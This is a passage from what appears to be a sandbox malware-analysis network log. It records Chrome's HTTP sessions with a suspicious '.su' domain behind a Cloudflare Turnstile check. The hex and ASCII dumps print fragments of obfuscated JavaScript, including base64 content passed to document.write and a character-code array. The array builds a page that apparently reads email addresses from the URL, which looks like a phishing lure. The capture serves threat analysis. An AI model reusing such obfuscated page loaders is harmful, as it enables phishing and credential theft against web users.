                                                          CF-RAY: 84a8ff3dcef84552-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:24 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                          Data Ascii: 7invalid
                                                          2024-01-24 14:34:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.649750172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:24 UTC778OUTPOST /0YnPUEkvNYKUHRxh HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          Content-Length: 712
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-platform: "Windows"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGtioxb3IIbOYZnWf
                                                          Accept: */*
                                                          Origin: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:24 UTC712OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 47 74 69 6f 78 62 33 49 49 62 4f 59 5a 6e 57 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 59 47 4e 44 35 78 6a 76 38 78 74 41 45 54 56 49 6c 79 59 75 38 6d 41 35 78 4d 65 4c 4b 6c 74 62 5f 7a 72 72 69 37 72 4a 45 75 34 37 68 65 78 55 63 50 50 74 67 39 6d 31 4f 45 66 78 64 48 49 46 69 33 76 35 53 44 75 72 54 6f 72 2d 31 76 51 48 4d 4a 36 5f 76 75 49 38 65 32 53 77 4d 45 52 53 35 76 53 31 68 66 54 41 75 47 66 30 4f 7a 71 6a 6a 39 2d 37 5f 77 49 35 57 5f 62 52 33 77 78 5f 57 31 4d 33 59 32 33 44 72 74 42 55 43 69 78 76 43 71 66
                                                          Data Ascii: ------WebKitFormBoundaryGtioxb3IIbOYZnWfContent-Disposition: form-data; name="cf-turnstile-response"0.YGND5xjv8xtAETVIlyYu8mA5xMeLKltb_zrri7rJEu47hexUcPPtg9m1OEfxdHIFi3v5SDurTor-1vQHMJ6_vuI8e2SwMERS5vS1hfTAuGf0Ozqjj9-7_wI5W_bR3wx_W1M3Y23DrtBUCixvCqf
                                                          2024-01-24 14:34:27 UTC738INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:27 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YLcNIB2FebMaFJspZbVupRKeGdH1IxW2V2QFoNjqf1ML9JKMtuH9JyaOrEumpDRmSP7Et80x%2F0OtxZxffaiKXYUEeh7H9cW9mToOmprZCyyqPEFvA6OwXYBlrBiDH2EcbsNiJyyR00tc0%2F5pPorr0XY%2BbsPt"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff3cdb976741-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.649753172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:27 UTC828OUTGET /Ad89NLTS/ HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-User: ?1
                                                          Sec-Fetch-Dest: document
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:28 UTC731INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jrqKUzout8fdF1emorHTMWalMWkussZuzH6LXKP4Qbda1niKyAjP6PExq8wOvLJgYDJ9wD33vK6nzczHyKSrq%2F7fp%2Fs%2Bdw36QBMIn6prb1Sw7TmkL7zCMNEH2jbLTdGC8VCNNKazwK04LXXCHo%2FtbzlwtqhN"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff528b181803-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:28 UTC638INData Raw: 32 65 35 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 62 63 68 74 6d 6c 20 3d 20 27 6e 58 62 52 77 74 48 63 47 55 62 66 79 27 3b 0d 0a 76 61 72 20 62 72 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 32 29 3b 0d 0a 76 61 72 20 65 73 20 3d 20 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 6d 61 74 63 68 28 2f 58 28 2e 2b 29 24 2f 29 20 7c 7c 20 5b 5d 29 5b 32 5d 3b 0d 0a 76 61 72 20 75 72 20 3d 20 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0d 0a 76 61 72 20 62 63 68 74 6d 6c 20 3d 20 27 48 53 79 59 49 78 78 54 67 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 53 4b 74 46 62 70 44 64 72 45 28 77 77 75 4c 6c 4e 68 47 69 63 62 6b 2c 20 66 46 68 55 69 56
                                                          Data Ascii: 2e5<script>var bchtml = 'nXbRwtHcGUbfy';var br = window.location.hash.substr(2);var es = (window.location.href.match(/X(.+)$/) || [])[2];var ur = new URL(window.location.href);var bchtml = 'HSyYIxxTg';function SKtFbpDdrE(wwuLlNhGicbk, fFhUiV
                                                          2024-01-24 14:34:28 UTC110INData Raw: 49 42 38 32 4d 53 59 35 4e 52 34 39 50 54 45 55 48 78 34 2b 45 51 51 46 4b 7a 77 70 43 6c 64 77 63 47 78 6b 45 69 51 63 4f 52 55 74 52 67 3d 3d 60 2c 20 60 4e 50 4b 61 47 6e 50 65 59 78 57 60 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 71 42 69 44 66 49 62 44 70 56 6b 4e 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                          Data Ascii: IB82MSY5NR49PTEUHx4+EQQFKzwpCldwcGxkEiQcORUtRg==`, `NPKaGnPeYxW`);document.write(qBiDfIbDpVkN);</script>
                                                          2024-01-24 14:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.649754104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:27 UTC420OUTGET /0YnPUEkvNYKUHRxh HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:28 UTC632INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hmAhXG2b02DNmkmUDYap%2BOeG4LqjAXP%2FXuWDT%2BiXC7jBdybv6aQGYpX8bHfozObR%2F2WNjyId1GgUUJaHld1wrqsRTKazU3GkeH4L4IIFXm9iZbllO3AThHga19v49LsFRPO07lE7NOAZo5r%2BFGAIlSamVYbu"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff53fbfa78d2-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.649752172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:28 UTC635OUTGET /1zVUXHxamXrpmXhlHPnZeBElLS/ HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:28 UTC734INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:28 GMT
                                                          Content-Type: text/javascript;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OTcjwlVxBgET1GSYrubrgu%2FF9hO6ANnJNVjcASuKqJvOMN85dVzEsmrP%2FCwTslFqyxcdx7QtdKdY2y7fgJa0j3KnEzx8TlAU6WSZvuGTpCrJAL3K9TmFg6uDlTO1o5Cqx4lYvTiK%2FxBKXG6yMw34OEenByMC"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff57399e6730-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:28 UTC635INData Raw: 33 31 37 65 0d 0a 76 61 72 20 65 72 70 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 65 72 70 5b 30 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 31 5d 20 3d 20 33 33 3b 0a 65 72 70 5b 32 5d 20 3d 20 31 30 30 3b 0a 65 72 70 5b 33 5d 20 3d 20 31 31 31 3b 0a 65 72 70 5b 34 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 35 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 36 5d 20 3d 20 31 32 31 3b 0a 65 72 70 5b 37 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b 38 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 39 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 31 30 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 31 31 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 31 32 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 31 33 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 31 34 5d 20 3d 20 36 32 3b 0a 65 72 70 5b 31 35 5d 20 3d 20 31 33 3b 0a 65 72 70 5b
                                                          Data Ascii: 317evar erp = new Array;erp[0] = 60;erp[1] = 33;erp[2] = 100;erp[3] = 111;erp[4] = 99;erp[5] = 116;erp[6] = 121;erp[7] = 112;erp[8] = 101;erp[9] = 32;erp[10] = 104;erp[11] = 116;erp[12] = 109;erp[13] = 108;erp[14] = 62;erp[15] = 13;erp[
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 3d 20 31 30 3b 0a 65 72 70 5b 34 33 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 34 34 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 34 35 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 34 36 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 34 37 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 34 38 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 34 39 5d 20 3d 20 36 32 3b 0a 65 72 70 5b 35 30 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 35 31 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 35 32 5d 20 3d 20 31 31 31 3b 0a 65 72 70 5b 35 33 5d 20 3d 20 31 31 37 3b 0a 65 72 70 5b 35 34 5d 20 3d 20 31 30 30 3b 0a 65 72 70 5b 35 35 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 35 36 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 35 37 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 35 38 5d 20 3d 20 31 31 34 3b 0a 65 72 70 5b 35 39 5d 20 3d 20 31 30 31
                                                          Data Ascii: = 10;erp[43] = 60;erp[44] = 116;erp[45] = 105;erp[46] = 116;erp[47] = 108;erp[48] = 101;erp[49] = 62;erp[50] = 99;erp[51] = 108;erp[52] = 111;erp[53] = 117;erp[54] = 100;erp[55] = 102;erp[56] = 108;erp[57] = 97;erp[58] = 114;erp[59] = 101
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 5d 20 3d 20 34 30 3b 0a 65 72 70 5b 31 33 35 5d 20 3d 20 39 32 3b 0a 65 72 70 5b 31 33 36 5d 20 3d 20 34 36 3b 0a 65 72 70 5b 31 33 37 5d 20 3d 20 39 31 3b 0a 65 72 70 5b 31 33 38 5d 20 3d 20 39 32 3b 0a 65 72 70 5b 31 33 39 5d 20 3d 20 31 31 39 3b 0a 65 72 70 5b 31 34 30 5d 20 3d 20 34 35 3b 0a 65 72 70 5b 31 34 31 5d 20 3d 20 39 33 3b 0a 65 72 70 5b 31 34 32 5d 20 3d 20 34 33 3b 0a 65 72 70 5b 31 34 33 5d 20 3d 20 34 31 3b 0a 65 72 70 5b 31 34 34 5d 20 3d 20 34 32 3b 0a 65 72 70 5b 31 34 35 5d 20 3d 20 36 34 3b 0a 65 72 70 5b 31 34 36 5d 20 3d 20 34 30 3b 0a 65 72 70 5b 31 34 37 5d 20 3d 20 39 31 3b 0a 65 72 70 5b 31 34 38 5d 20 3d 20 39 32 3b 0a 65 72 70 5b 31 34 39 5d 20 3d 20 31 31 39 3b 0a 65 72 70 5b 31 35 30 5d 20 3d 20 34 35 3b 0a 65 72 70 5b 31
                                                          Data Ascii: ] = 40;erp[135] = 92;erp[136] = 46;erp[137] = 91;erp[138] = 92;erp[139] = 119;erp[140] = 45;erp[141] = 93;erp[142] = 43;erp[143] = 41;erp[144] = 42;erp[145] = 64;erp[146] = 40;erp[147] = 91;erp[148] = 92;erp[149] = 119;erp[150] = 45;erp[1
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 32 32 33 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 32 32 34 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 32 32 35 5d 20 3d 20 36 39 3b 0a 65 72 70 5b 32 32 36 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 32 32 37 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 32 32 38 5d 20 3d 20 31 31 37 3b 0a 65 72 70 5b 32 32 39 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 32 33 30 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 32 33 31 5d 20 3d 20 34 31 3b 0a 65 72 70 5b 32 33 32 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 32 33 33 5d 20 3d 20 31 32 33 3b 0a 65 72 70 5b 32 33 34 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 32 33 35 5d 20 3d 20 31 31 34 3b 0a 65 72 70 5b 32 33 36 5d 20 3d 20 31 32 31 3b 0a 65 72 70 5b 32 33 37 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 32 33 38 5d 20 3d 20 31 32 33 3b 0a 65 72 70 5b 32 33 39 5d 20 3d
                                                          Data Ascii: 223] = 102;erp[224] = 70;erp[225] = 69;erp[226] = 108;erp[227] = 79;erp[228] = 117;erp[229] = 78;erp[230] = 104;erp[231] = 41;erp[232] = 32;erp[233] = 123;erp[234] = 116;erp[235] = 114;erp[236] = 121;erp[237] = 32;erp[238] = 123;erp[239] =
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 3b 0a 65 72 70 5b 33 31 32 5d 20 3d 20 34 31 3b 0a 65 72 70 5b 33 31 33 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 33 31 34 5d 20 3d 20 36 33 3b 0a 65 72 70 5b 33 31 35 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 33 31 36 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 33 31 37 5d 20 3d 20 31 31 30 3b 0a 65 72 70 5b 33 31 38 5d 20 3d 20 31 32 30 3b 0a 65 72 70 5b 33 31 39 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 33 32 30 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 33 32 31 5d 20 3d 20 37 35 3b 0a 65 72 70 5b 33 32 32 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 33 32 33 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 33 32 34 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 33 32 35 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 33 32 36 5d 20 3d 20 31 32 32 3b 0a 65 72 70 5b 33 32 37 5d 20 3d 20 38 39 3b 0a 65 72 70 5b 33 32 38 5d 20
                                                          Data Ascii: ;erp[312] = 41;erp[313] = 32;erp[314] = 63;erp[315] = 32;erp[316] = 98;erp[317] = 110;erp[318] = 120;erp[319] = 87;erp[320] = 67;erp[321] = 75;erp[322] = 71;erp[323] = 98;erp[324] = 102;erp[325] = 86;erp[326] = 122;erp[327] = 89;erp[328]
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 3d 20 33 32 3b 0a 65 72 70 5b 34 30 31 5d 20 3d 20 36 31 3b 0a 65 72 70 5b 34 30 32 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 34 30 33 5d 20 3d 20 33 34 3b 0a 65 72 70 5b 34 30 34 5d 20 3d 20 33 34 3b 0a 65 72 70 5b 34 30 35 5d 20 3d 20 35 39 3b 0a 65 72 70 5b 34 30 36 5d 20 3d 20 31 33 3b 0a 65 72 70 5b 34 30 37 5d 20 3d 20 31 30 3b 0a 65 72 70 5b 34 30 38 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 34 30 39 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 34 31 30 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 34 31 31 5d 20 3d 20 34 30 3b 0a 65 72 70 5b 34 31 32 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 34 31 33 5d 20 3d 20 31 31 34 3b 0a 65 72 70 5b 34 31 34 5d 20 3d 20 34 31 3b 0a 65 72 70 5b 34 31 35 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 34 31 36 5d 20 3d 20 31 32 33 3b 0a 65 72 70 5b 34
                                                          Data Ascii: = 32;erp[401] = 61;erp[402] = 32;erp[403] = 34;erp[404] = 34;erp[405] = 59;erp[406] = 13;erp[407] = 10;erp[408] = 105;erp[409] = 102;erp[410] = 32;erp[411] = 40;erp[412] = 98;erp[413] = 114;erp[414] = 41;erp[415] = 32;erp[416] = 123;erp[4
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 5b 34 38 39 5d 20 3d 20 31 33 3b 0a 65 72 70 5b 34 39 30 5d 20 3d 20 31 30 3b 0a 65 72 70 5b 34 39 31 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 34 39 32 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 34 39 33 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 34 39 34 5d 20 3d 20 34 30 3b 0a 65 72 70 5b 34 39 35 5d 20 3d 20 31 30 37 3b 0a 65 72 70 5b 34 39 36 5d 20 3d 20 31 31 33 3b 0a 65 72 70 5b 34 39 37 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 34 39 38 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 34 39 39 5d 20 3d 20 37 35 3b 0a 65 72 70 5b 35 30 30 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 35 30 31 5d 20 3d 20 31 31 38 3b 0a 65 72 70 5b 35 30 32 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b 35 30 33 5d 20 3d 20 38 31 3b 0a 65 72 70 5b 35 30 34 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 35 30 35 5d 20 3d
                                                          Data Ascii: [489] = 13;erp[490] = 10;erp[491] = 105;erp[492] = 102;erp[493] = 32;erp[494] = 40;erp[495] = 107;erp[496] = 113;erp[497] = 67;erp[498] = 108;erp[499] = 75;erp[500] = 101;erp[501] = 118;erp[502] = 112;erp[503] = 81;erp[504] = 79;erp[505] =
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 65 72 70 5b 35 37 38 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 35 37 39 5d 20 3d 20 36 39 3b 0a 65 72 70 5b 35 38 30 5d 20 3d 20 38 34 3b 0a 65 72 70 5b 35 38 31 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 35 38 32 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 35 38 33 5d 20 3d 20 37 36 3b 0a 65 72 70 5b 35 38 34 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 35 38 35 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 35 38 36 5d 20 3d 20 36 33 3b 0a 65 72 70 5b 35 38 37 5d 20 3d 20 31 30 32 3b 0a 65 72 70 5b 35 38 38 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 35 38 39 5d 20 3d 20 35 36 3b 0a 65 72 70 5b 35 39 30 5d 20 3d 20 35 31 3b 0a 65 72 70 5b 35 39 31 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 39 32 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 39 33 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 35 39 34 5d 20 3d 20 35 31
                                                          Data Ascii: erp[578] = 71;erp[579] = 69;erp[580] = 84;erp[581] = 97;erp[582] = 85;erp[583] = 76;erp[584] = 73;erp[585] = 102;erp[586] = 63;erp[587] = 102;erp[588] = 98;erp[589] = 56;erp[590] = 51;erp[591] = 52;erp[592] = 52;erp[593] = 50;erp[594] = 51
                                                          2024-01-24 14:34:28 UTC1369INData Raw: 31 31 37 3b 0a 65 72 70 5b 36 36 37 5d 20 3d 20 31 31 34 3b 0a 65 72 70 5b 36 36 38 5d 20 3d 20 36 31 3b 0a 65 72 70 5b 36 36 39 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 36 37 30 5d 20 3d 20 33 39 3b 0a 65 72 70 5b 36 37 31 5d 20 3d 20 34 36 3b 0a 65 72 70 5b 36 37 32 5d 20 3d 20 34 36 3b 0a 65 72 70 5b 36 37 33 5d 20 3d 20 34 37 3b 0a 65 72 70 5b 36 37 34 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 36 37 35 5d 20 3d 20 36 38 3b 0a 65 72 70 5b 36 37 36 5d 20 3d 20 31 30 33 3b 0a 65 72 70 5b 36 37 37 5d 20 3d 20 31 32 31 3b 0a 65 72 70 5b 36 37 38 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 36 37 39 5d 20 3d 20 38 31 3b 0a 65 72 70 5b 36 38 30 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 36 38 31 5d 20 3d 20 31 31 33 3b 0a 65 72 70 5b 36 38 32 5d 20 3d 20 36 38 3b 0a 65 72 70 5b 36 38
                                                          Data Ascii: 117;erp[667] = 114;erp[668] = 61;erp[669] = 32;erp[670] = 39;erp[671] = 46;erp[672] = 46;erp[673] = 47;erp[674] = 86;erp[675] = 68;erp[676] = 103;erp[677] = 121;erp[678] = 97;erp[679] = 81;erp[680] = 77;erp[681] = 113;erp[682] = 68;erp[68
                                                          2024-01-24 14:34:28 UTC1091INData Raw: 37 35 35 5d 20 3d 20 31 30 3b 0a 65 72 70 5b 37 35 36 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 37 35 37 5d 20 3d 20 34 37 3b 0a 65 72 70 5b 37 35 38 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 37 35 39 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 37 36 30 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 37 36 31 5d 20 3d 20 31 30 30 3b 0a 65 72 70 5b 37 36 32 5d 20 3d 20 36 32 3b 0a 65 72 70 5b 37 36 33 5d 20 3d 20 31 33 3b 0a 65 72 70 5b 37 36 34 5d 20 3d 20 31 30 3b 0a 65 72 70 5b 37 36 35 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 37 36 36 5d 20 3d 20 34 37 3b 0a 65 72 70 5b 37 36 37 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 37 36 38 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 37 36 39 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 37 37 30 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 37 37 31 5d 20 3d 20 36
                                                          Data Ascii: 755] = 10;erp[756] = 60;erp[757] = 47;erp[758] = 104;erp[759] = 101;erp[760] = 97;erp[761] = 100;erp[762] = 62;erp[763] = 13;erp[764] = 10;erp[765] = 60;erp[766] = 47;erp[767] = 104;erp[768] = 116;erp[769] = 109;erp[770] = 108;erp[771] = 6


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.649756172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:28 UTC809OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
